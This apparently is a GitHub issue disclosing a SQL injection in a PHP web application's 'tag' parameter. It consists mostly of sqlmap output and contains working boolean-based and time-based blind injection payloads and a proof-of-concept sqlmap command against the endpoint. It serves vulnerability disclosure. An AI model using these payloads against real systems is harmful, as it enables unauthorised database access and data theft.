sqlmap identified the following injection point(s) with a total of HTTP(s) requests:
Parameter: tag (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=api&tag=8' AND 5773=5773 AND 'aeqS'='aeqS
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: act=api&tag=8' AND (SELECT 2616 FROM (SELECT(SLEEP(5)))Uikd) AND 'WWaT'='WWaT
The text was updated successfully, but these errors were encountered:
poc :
python3 sqlmap.py - u "http://localhost/index.php?act=api&tag=8"
sqlmap identified the following injection point(s) with a total of HTTP(s) requests:
Parameter: tag (GET)
The text was updated successfully, but these errors were encountered: